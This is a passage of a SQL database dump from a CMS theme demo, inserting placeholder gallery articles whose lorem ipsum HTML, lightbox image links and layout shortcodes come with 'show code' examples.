src=\"images/demo/gallery/column_3/2.jpg\" alt=\"gallery\" /&gt;&lt;span class=\"gallery-desc\"&gt;&lt;strong&gt;Lorem ipsum dolor sit amet&lt;/strong&gt;arcu sit ipsum dolor sit amet&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column]\r\n\r\n<i>[</i>column size=\"1-3\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/3_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" width=\"383\" height=\"253\" src=\"images/demo/gallery/column_3/3.jpg\" alt=\"gallery\" /&gt;&lt;span class=\"gallery-desc\"&gt;&lt;strong&gt;Lorem ipsum dolor sit amet&lt;/strong&gt;arcu sit ipsum dolor sit amet&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column]\r\n\r\n<i>[</i>/grid]\r\n\r\n[/toggle]\r\n', '', 1, 19, '2012-04-03 06:50:13', 196, '', '2014-07-26 09:15:52', 42, 0, '0000-00-00 00:00:00', '2012-04-03 06:50:13', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 10, 9, '', '', 1, 1130, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(39, 94, '4 Column Gallery', '4-column-gallery', '[grid]\r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_4/1_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/1.jpg\" alt=\"gallery\" width=\"275\" height=\"182\" /></a></p>\r\n[/column] \r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_4/2_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/2.jpg\" alt=\"gallery\" width=\"275\" height=\"182\" /></a></p>\r\n[/column]\r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_4/3_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/3.jpg\" alt=\"gallery\" width=\"275\" height=\"182\" /></a></p>\r\n[/column]\r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_4/4_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/4.jpg\" alt=\"gallery\" width=\"275\" height=\"182\" /></a></p>\r\n[/column]\r\n[/grid]\r\n\r\n[grid]\r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_4/5_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/5.jpg\" alt=\"gallery\" width=\"275\" height=\"182\" /></a></p>\r\n[/column]\r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_4/6_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/6.jpg\" alt=\"gallery\" width=\"275\" height=\"182\" /></a></p>\r\n[/column]\r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_4/7_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/7.jpg\" alt=\"gallery\" width=\"275\" height=\"182\" /></a></p>\r\n[/column]\r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_4/8_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/8.jpg\" alt=\"gallery\" width=\"275\" height=\"182\" /></a></p>\r\n[/column]\r\n[/grid]\r\n\r\n<hr class=\"divide\" />\r\n\r\n[toggle state=\"closed code\" title=\"show code\"]\r\n\r\n<i>[</i>grid]\r\n<i>[</i>column size=\"1-4\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_4/1_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" width=\"275\" height=\"182\" src=\"images/demo/gallery/column_4/1.jpg\" alt=\"gallery\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column] \r\n\r\n<i>[</i>column size=\"1-4\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_4/2_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" width=\"275\" height=\"182\" src=\"images/demo/gallery/column_4/2.jpg\" alt=\"gallery\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column]\r\n\r\n<i>[</i>column size=\"1-4\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_4/3_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" width=\"275\" height=\"182\" src=\"images/demo/gallery/column_4/3.jpg\" alt=\"gallery\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column]\r\n\r\n<i>[</i>column size=\"1-4\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_4/4_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" width=\"275\" height=\"182\" src=\"images/demo/gallery/column_4/4.jpg\" alt=\"gallery\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column]\r\n\r\n<i>[</i>/grid]\r\n\r\n[/toggle]', '', 1, 19, '2012-04-03 06:50:13', 196, '', '2014-07-26 09:18:48', 42, 0, '0000-00-00 00:00:00', '2012-04-03 06:50:13', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 17, 8, '', '', 1, 680, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(40, 95, 'Gallery in Blocks', 'gallery-in-blocks', '[grid][column size=\"1-3\"]\r\n[heading size=\"h3\" style=\"module-title\"]Consectetur adipisicing elit[/heading]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/1_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_3/1.jpg\" alt=\"gallery\" width=\"383\" height=\"253\" /></a></p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\r\n[button style=\"color uk-float-right\" href=\"#\" target=\"_self\"]Learn more[/button]\r\n[/column]\r\n\r\n[column size=\"1-3\"]\r\n[heading size=\"h3\" style=\"module-title\"]Eeiusmod tempor[/heading]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/2_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_3/2.jpg\" alt=\"gallery\" width=\"383\" height=\"253\" /></a></p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\r\n[button style=\"color uk-float-right\" href=\"#\" target=\"_self\"]Learn more[/button]\r\n[/column]\r\n\r\n[column size=\"1-3\"]\r\n[heading size=\"h3\" style=\"module-title\"]Adipisicing elite[/heading]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/3_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_3/3.jpg\" alt=\"gallery\" width=\"383\" height=\"253\" /></a></p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\r\n[button style=\"color uk-float-right\" href=\"#\" target=\"_self\"]Learn more[/button]\r\n[/column]\r\n[/grid]\r\n\r\n[grid][column size=\"1-3\"]\r\n[heading size=\"h3\" style=\"module-title\"]Tonsectetur adipisicing[/heading]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/4_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_3/4.jpg\" alt=\"gallery\" width=\"383\" height=\"253\" /></a></p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\r\n[button style=\"color uk-float-right\" href=\"#\" target=\"_self\"]Learn more[/button]\r\n[/column]\r\n[column size=\"1-3\"]\r\n[heading size=\"h3\" style=\"module-title\"]Labore et dolore[/heading]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/5_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_3/5.jpg\" alt=\"gallery\" width=\"383\" height=\"253\" /></a></p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\r\n[button style=\"color uk-float-right\" href=\"#\" target=\"_self\"]Learn more[/button]\r\n[/column]\r\n[column size=\"1-3\"]\r\n[heading size=\"h3\" style=\"module-title\"]Dolor sit amet[/heading]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/6_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_3/6.jpg\" alt=\"gallery\" width=\"383\" height=\"253\" /></a></p>\r\n<p>Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut labore et dolore magna aliqua.</p>\r\n[button style=\"color uk-float-right\" href=\"#\" target=\"_self\"]Learn more[/button]\r\n[/column][/grid]\r\n\r\n<hr class=\"divide\" />\r\n\r\n[toggle state=\"closed code\" title=\"show code\"]\r\n\r\n<i>[</i>grid]<i>\r\n\r\n[</i>column size=\"1-3\"]\r\n<i>[</i>heading size=\"h3\" style=\"module-title\"]Your title<i>[</i>/heading]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/1_big.jpg\" title=\"your caption here\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" src=\"images/demo/gallery/column_3/1.jpg\" alt=\"gallery\" width=\"383\" height=\"253\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n&lt;p&gt;Your content here&lt;/p&gt;\r\n<i>[</i>button style=\"color uk-float-right\" href=\"#\" target=\"_self\"]Learn more<i>[</i>/button]\r\n<i>[</i>/column]\r\n\r\n<i>[</i>column size=\"1-3\"]\r\n<i>[</i>heading size=\"h3\" style=\"module-title\"]Your title<i>[</i>/heading]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/2_big.jpg\" title=\"your caption here\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" src=\"images/demo/gallery/column_3/2.jpg\" alt=\"gallery\" width=\"383\" height=\"253\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n&lt;p&gt;Your content here&lt;/p&gt;\r\n<i>[</i>button style=\"color uk-float-right\" href=\"#\" target=\"_self\"]Learn more<i>[</i>/button]\r\n<i>[</i>/column]\r\n\r\n<i>[</i>column size=\"1-3\"]\r\n<i>[</i>heading size=\"h3\" style=\"module-title\"]Your title<i>[</i>/heading]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_3/3_big.jpg\" title=\"your caption here\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" src=\"images/demo/gallery/column_3/3.jpg\" alt=\"gallery\" width=\"383\" height=\"253\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n&lt;p&gt;Your content here&lt;/p&gt;\r\n<i>[</i>button style=\"color uk-float-right\" href=\"#\" target=\"_self\"]Learn more<i>[</i>/button]\r\n<i>[</i>/column]\r\n\r\n<i>[</i>/grid]\r\n\r\n\r\n[/toggle]', '', 1, 20, '2012-04-03 06:50:13', 196, '', '2014-07-26 09:20:35', 42, 0, '0000-00-00 00:00:00', '2012-04-03 06:50:13', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 26, 5, '', '', 1, 1790, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(42, 97, 'Gallery by Category', 'gallery-by-category', '[blockquote author=\"\"]\r\n<p>This project was done by <strong>John Doe</strong> on <abbr data-uk-tooltip title=\"an amazing marketplace where you can get cool templates\">themeforest</abbr> and cost him <strong>$35</strong>. All the work was done in under <strong>2 months</strong> and completed on time and within the stipulated budget guidelines</p>\r\n<p>[/blockquote]</p>\r\n<hr />\r\n[grid][column size=\"1-4\"]\r\n[heading size=\"h3\" style=\"module-title\"]Eeiusmod tempor[/heading]\r\n<p>Pellentesque adipiscing odio eu neque gravida vehicula. Ut ultricies diam vel est convallis non auctor dui scelerisque. Quisque at erat sem</p>\r\n[/column]\r\n\r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery1\" href=\"images/demo/gallery/column_4/1_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/1.jpg\" alt=\"portfolio\" width=\"275\" height=\"182\" /></a></p>\r\n\r\n[/column]\r\n\r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery1\" href=\"images/demo/gallery/column_4/2_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/2.jpg\" alt=\"portfolio\" width=\"275\" height=\"182\" /></a></p>\r\n\r\n[/column]\r\n\r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery1\" href=\"images/demo/gallery/column_4/3_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/3.jpg\" alt=\"portfolio\" width=\"275\" height=\"182\" /></a></p>\r\n\r\n[/column]\r\n[/grid]\r\n\r\n<hr class=\"divide\" />\r\n\r\n[blockquote author=\"\"]\r\n<p>This project was done by<strong> Jane Doe</strong> on <abbr data-uk-tooltip title=\"an amazing marketplace where you can get cool scripts\">codecanyon</abbr> and cost him <strong>$6</strong>. All the work was done in under<strong> 4 days</strong> and completed on time and within the stipulated budget guidelines</p>\r\n<p>[/blockquote]</p>\r\n\r\n<hr />\r\n\r\n[grid]\r\n\r\n[column size=\"1-4\"]\r\n[heading size=\"h3\" style=\"module-title\"]Adipisicing elite[/heading]\r\n<p>Pellentesque adipiscing odio eu neque gravida vehicula. Ut ultricies diam vel est convallis non auctor dui scelerisque. Quisque at erat sem</p>\r\n[/column]\r\n\r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery2\" href=\"images/demo/gallery/column_4/4_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/4.jpg\" alt=\"portfolio\" width=\"275\" height=\"182\" /></a></p>\r\n[/column]\r\n\r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery2\" href=\"images/demo/gallery/column_4/5_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/5.jpg\" alt=\"portfolio\" width=\"275\" height=\"182\" /></a></p>\r\n[/column]\r\n\r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery2\" href=\"images/demo/gallery/column_4/6_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/6.jpg\" alt=\"portfolio\" width=\"275\" height=\"182\" /></a></p>\r\n[/column]\r\n\r\n[/grid]\r\n\r\n<hr class=\"divide\" />\r\n\r\n[blockquote author=\"\"]\r\n<p>\"This project was done by <strong>Henry Doe</strong> on <abbr data-uk-tooltip title=\"an amazing marketplace where you can get cool photos\">photodune</abbr> and cost him roughly <strong>$1</strong>. All the work was done in under <strong>1 year</strong> and completed on time and within the stipulated budget guidelines</p>\r\n<p>[/blockquote]</p>\r\n<hr />\r\n[grid][column size=\"1-4\"]\r\n[heading size=\"h3\" style=\"module-title\"]Labore et dolore[/heading]\r\n<p>Pellentesque adipiscing odio eu neque gravida vehicula. Ut ultricies diam vel est convallis non auctor dui scelerisque. Quisque at erat sem</p>\r\n[/column]\r\n\r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery3\" href=\"images/demo/gallery/column_4/7_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/7.jpg\" alt=\"portfolio\" width=\"275\" height=\"182\" /></a></p>\r\n\r\n[/column]\r\n\r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery3\" href=\"images/demo/gallery/column_4/8_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/8.jpg\" alt=\"portfolio\" width=\"275\" height=\"182\" /></a></p>\r\n\r\n[/column]\r\n\r\n[column size=\"1-4\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery3\" href=\"images/demo/gallery/column_4/9_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_4/9.jpg\" alt=\"portfolio\" width=\"275\" height=\"182\" /></a></p>\r\n\r\n[/column]\r\n[/grid]\r\n\r\n<hr class=\"divide\" />\r\n\r\n[toggle state=\"closed code\" title=\"show code\"]\r\n\r\n<i>[</i>blockquote author=\"\"]\r\n&lt;p&gt;This project was done by&lt;strong&gt; Jane Doe&lt;/strong&gt; on &lt;abbr data-uk-tooltip title=\"an amazing marketplace where you can get cool scripts\"&gt;codecanyon&lt;/abbr&gt; and cost him &lt;strong&gt;$6&lt;/strong&gt;. All the work was done in under&lt;strong&gt; 4 days&lt;/strong&gt; and completed on time and within the stipulated budget guidelines&lt;/p&gt;\r\n&lt;p&gt;<i>[</i>/blockquote]&lt;/p&gt;\r\n\r\n&lt;hr /&gt;\r\n\r\n<i>[</i>grid]\r\n\r\n<i>[</i>column size=\"1-4\"]\r\n<i>[</i>heading size=\"h3\" style=\"module-title\"]Adipisicing elite<i>[</i>/heading]\r\n&lt;p&gt;Pellentesque adipiscing odio eu neque gravida vehicula. Ut ultricies diam vel est convallis non auctor dui scelerisque. Quisque at erat sem&lt;/p&gt;\r\n<i>[</i>/column]\r\n\r\n<i>[</i>column size=\"1-4\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery2\" href=\"images/demo/gallery/column_4/4_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" src=\"images/demo/gallery/column_4/4.jpg\" alt=\"portfolio\" width=\"275\" height=\"182\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column]\r\n\r\n<i>[</i>column size=\"1-4\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery2\" href=\"images/demo/gallery/column_4/5_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" src=\"images/demo/gallery/column_4/5.jpg\" alt=\"portfolio\" width=\"275\" height=\"182\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column]\r\n\r\n<i>[</i>column size=\"1-4\"]\r\n&lt;p&gt;&lt;a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery2\" href=\"images/demo/gallery/column_4/6_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"&gt;&lt;img class=\"pic3d\" src=\"images/demo/gallery/column_4/6.jpg\" alt=\"portfolio\" width=\"275\" height=\"182\" /&gt;&lt;/a&gt;&lt;/p&gt;\r\n<i>[</i>/column]\r\n\r\n<i>[</i>/grid]\r\n\r\n[/toggle]', '', 1, 2, '2012-04-03 06:50:13', 196, '', '2014-07-26 09:25:21', 42, 0, '0000-00-00 00:00:00', '2012-04-03 06:50:13', '0000-00-00 00:00:00', '{\"image_intro\":\"\",\"float_intro\":\"\",\"image_intro_alt\":\"\",\"image_intro_caption\":\"\",\"image_fulltext\":\"\",\"float_fulltext\":\"\",\"image_fulltext_alt\":\"\",\"image_fulltext_caption\":\"\"}', '{\"urla\":false,\"urlatext\":\"\",\"targeta\":\"\",\"urlb\":false,\"urlbtext\":\"\",\"targetb\":\"\",\"urlc\":false,\"urlctext\":\"\",\"targetc\":\"\"}', '{\"show_title\":\"\",\"link_titles\":\"\",\"show_tags\":\"\",\"show_intro\":\"\",\"info_block_position\":\"\",\"show_category\":\"\",\"link_category\":\"\",\"show_parent_category\":\"\",\"link_parent_category\":\"\",\"show_author\":\"\",\"link_author\":\"\",\"show_create_date\":\"\",\"show_modify_date\":\"\",\"show_publish_date\":\"\",\"show_item_navigation\":\"\",\"show_icons\":\"\",\"show_print_icon\":\"\",\"show_email_icon\":\"\",\"show_vote\":\"\",\"show_hits\":\"\",\"show_noauth\":\"\",\"urls_position\":\"\",\"alternative_readmore\":\"\",\"article_layout\":\"\",\"show_publishing_options\":\"\",\"show_article_options\":\"\",\"show_urls_images_backend\":\"\",\"show_urls_images_frontend\":\"\"}', 15, 15, '', '', 1, 641, '{\"robots\":\"\",\"author\":\"\",\"rights\":\"\",\"xreference\":\"\"}', 0, '*', '', ''),
(43, 98, '5 Column Gallery', '5-column-gallery', '[grid]\r\n[column size=\"1-5\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_5/1_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_5/1.jpg\" alt=\"gallery\" width=\"213\" height=\"140\" /></a></p>\r\n[/column] \r\n[column size=\"1-5\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_5/2_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_5/2.jpg\" alt=\"gallery\" width=\"213\" height=\"140\" /></a></p>\r\n[/column]\r\n[column size=\"1-5\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_5/3_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_5/3.jpg\" alt=\"gallery\" width=\"213\" height=\"140\" /></a></p>\r\n[/column]\r\n[column size=\"1-5\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_5/4_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_5/4.jpg\" alt=\"gallery\" width=\"213\" height=\"140\" /></a></p>\r\n[/column]\r\n[column size=\"1-5\"]\r\n<p><a class=\"uk-thumbnail-expand\" data-lightbox=\"group:gallery\" href=\"images/demo/gallery/column_5/5_big.jpg\" title=\"Lorem ipsum dolor sit amet, consectetur adipiscing elit.\" data-spotlight=\"on\"><img class=\"pic3d\" src=\"images/demo/gallery/column_5/5.jpg\" alt=\"gallery\" width=\"213\" height=\"140\" 